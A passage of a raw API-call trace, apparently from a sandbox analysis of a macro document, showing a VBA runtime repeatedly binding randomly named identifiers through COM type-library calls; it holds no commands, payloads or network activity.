ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb29da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rAUXUUDQ") returned 9 [0070.049] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rAUXUUDQ", lHashVal=0x102f70, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rAUXUUDQ") returned 0x102f70 [0070.049] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="rAUXUUDQ" | out: _Dst="rAUXUUDQ") returned 0x0 [0070.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="rAUXUUDQ") returned 9 [0070.049] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rAUXUUDQ", lHashVal=0x102f70, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.049] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.049] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb29da | out: _Dst=0x67c2d20) returned 0x0 [0070.049] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_rAUXUUDQ" | out: _Dst="_B_var_rAUXUUDQ") returned 0x0 [0070.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_rAUXUUDQ") returned 16 [0070.049] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rAUXUUDQ", lHashVal=0x1006f9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x55005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x55005800000000, pDummy=0x0) returned 0x0 [0070.049] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb29da | out: _Dst=0x144ec0) returned 0x0 [0070.049] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uAwZAB1B", lHashVal=0x10923c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a06, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uAwZAB1B") returned 9 [0070.049] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uAwZAB1B", lHashVal=0x10923c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a06, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uAwZAB1B") returned 9 [0070.050] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uAwZAB1B", lHashVal=0x10923c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAwZAB1B") returned 0x10923c [0070.050] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="uAwZAB1B" | out: _Dst="uAwZAB1B") returned 0x0 [0070.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="uAwZAB1B") returned 9 [0070.050] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uAwZAB1B", lHashVal=0x10923c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.050] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.050] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2a06 | out: _Dst=0x67c2d20) returned 0x0 [0070.050] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_uAwZAB1B" | out: _Dst="_B_var_uAwZAB1B") returned 0x0 [0070.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_uAwZAB1B") returned 16 [0070.050] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uAwZAB1B", lHashVal=0x1069c5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005a00000000, pDummy=0x0) returned 0x0 [0070.050] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2a06 | out: _Dst=0x144ec0) returned 0x0 [0070.050] ITypeComp:RemoteBind (in: This=0x665ba60, szName="m_x1DAQ", lHashVal=0x10eb66, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="m_x1DAQ") returned 8 [0070.050] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="m_x1DAQ", lHashVal=0x10eb66, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="m_x1DAQ") returned 8 [0070.050] ITypeComp:RemoteBind (in: This=0x665bd30, szName="m_x1DAQ", lHashVal=0x10eb66, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.051] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m_x1DAQ") returned 0x10eb66 [0070.051] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="m_x1DAQ" | out: _Dst="m_x1DAQ") returned 0x0 [0070.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="m_x1DAQ") returned 8 [0070.051] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="m_x1DAQ", lHashVal=0x10eb66, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.051] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d20 [0070.051] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x8, _Src=0x3cb2a5a | out: _Dst=0x67c2d20) returned 0x0 [0070.051] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_m_x1DAQ" | out: _Dst="_B_var_m_x1DAQ") returned 0x0 [0070.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_m_x1DAQ") returned 15 [0070.051] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_m_x1DAQ", lHashVal=0x10eeea, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x44003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x44003100000000, pDummy=0x0) returned 0x0 [0070.051] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2a5a | out: _Dst=0x144ec0) returned 0x0 [0070.051] ITypeComp:RemoteBind (in: This=0x665ba60, szName="LXAAc_", lHashVal=0x106c64, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a32, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LXAAc_") returned 7 [0070.051] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="LXAAc_", lHashVal=0x106c64, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2a32, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LXAAc_") returned 7 [0070.051] ITypeComp:RemoteBind (in: This=0x665bd30, szName="LXAAc_", lHashVal=0x106c64, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.051] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LXAAc_") returned 0x106c64 [0070.051] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="LXAAc_" | out: _Dst="LXAAc_") returned 0x0 [0070.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="LXAAc_") returned 7 [0070.052] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="LXAAc_", lHashVal=0x106c64, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.052] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d20 [0070.052] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2a32 | out: _Dst=0x67c2d20) returned 0x0 [0070.052] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_LXAAc_" | out: _Dst="_B_var_LXAAc_") returned 0x0 [0070.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_LXAAc_") returned 14 [0070.052] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_LXAAc_", lHashVal=0x10e70d, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0) returned 0x0 [0070.052] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2a32 | out: _Dst=0x144ec0) returned 0x0 [0070.052] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UAkXwA", lHashVal=0x1052dd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2aae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAkXwA") returned 7 [0070.052] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UAkXwA", lHashVal=0x1052dd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2aae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="UAkXwA") returned 7 [0070.052] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UAkXwA", lHashVal=0x1052dd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.052] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAkXwA") returned 0x1052dd [0070.052] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="UAkXwA" | out: _Dst="UAkXwA") returned 0x0 [0070.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="UAkXwA") returned 7 [0070.052] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UAkXwA", lHashVal=0x1052dd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.053] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d20 [0070.053] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2aae | out: _Dst=0x67c2d20) returned 0x0 [0070.053] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_UAkXwA" | out: _Dst="_B_var_UAkXwA") returned 0x0 [0070.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_UAkXwA") returned 14 [0070.053] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UAkXwA", lHashVal=0x10cd86, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x77005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x77005800000000, pDummy=0x0) returned 0x0 [0070.053] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2aae | out: _Dst=0x144ec0) returned 0x0 [0070.053] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cAxAoA", lHashVal=0x104850, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2ad6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cAxAoA") returned 7 [0070.053] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cAxAoA", lHashVal=0x104850, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2ad6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cAxAoA") returned 7 [0070.053] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cAxAoA", lHashVal=0x104850, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.053] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cAxAoA") returned 0x104850 [0070.053] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="cAxAoA" | out: _Dst="cAxAoA") returned 0x0 [0070.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="cAxAoA") returned 7 [0070.053] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cAxAoA", lHashVal=0x104850, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.054] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d20 [0070.054] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x7, _Src=0x3cb2ad6 | out: _Dst=0x67c2d20) returned 0x0 [0070.054] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_cAxAoA" | out: _Dst="_B_var_cAxAoA") returned 0x0 [0070.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_cAxAoA") returned 14 [0070.054] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cAxAoA", lHashVal=0x10c2f9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0) returned 0x0 [0070.054] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2ad6 | out: _Dst=0x144ec0) returned 0x0 [0070.054] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UAZcxUZA", lHashVal=0x10ff10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UAZcxUZA") returned 9 [0070.054] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UAZcxUZA", lHashVal=0x10ff10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="UAZcxUZA") returned 9 [0070.054] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UAZcxUZA", lHashVal=0x10ff10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.054] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UAZcxUZA") returned 0x10ff10 [0070.054] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="UAZcxUZA" | out: _Dst="UAZcxUZA") returned 0x0 [0070.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="UAZcxUZA") returned 9 [0070.054] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="UAZcxUZA", lHashVal=0x10ff10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.054] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d20 [0070.054] _mbscpy_s (in: _Dst=0x67c2d20, _DstSizeInBytes=0x9, _Src=0x3cb2afe | out: _Dst=0x67c2d20) returned 0x0 [0070.054] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_UAZcxUZA" | out: _Dst="_B_var_UAZcxUZA") returned 0x0 [0070.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_UAZcxUZA") returned 16 [0070.055] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_UAZcxUZA", lHashVal=0x10c718, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x78006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x78006300000000, pDummy=0x0) returned 0x0 [0070.055] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb2afe | out: _Dst=0x144ec0) returned 0x0 [0070.055] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EkA41A", lHashVal=0x101c7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="EkA41A") returned 7 [0070.055] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EkA41A", lHashVal=0x101c7c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="EkA41A") returned 7 [0070.055] 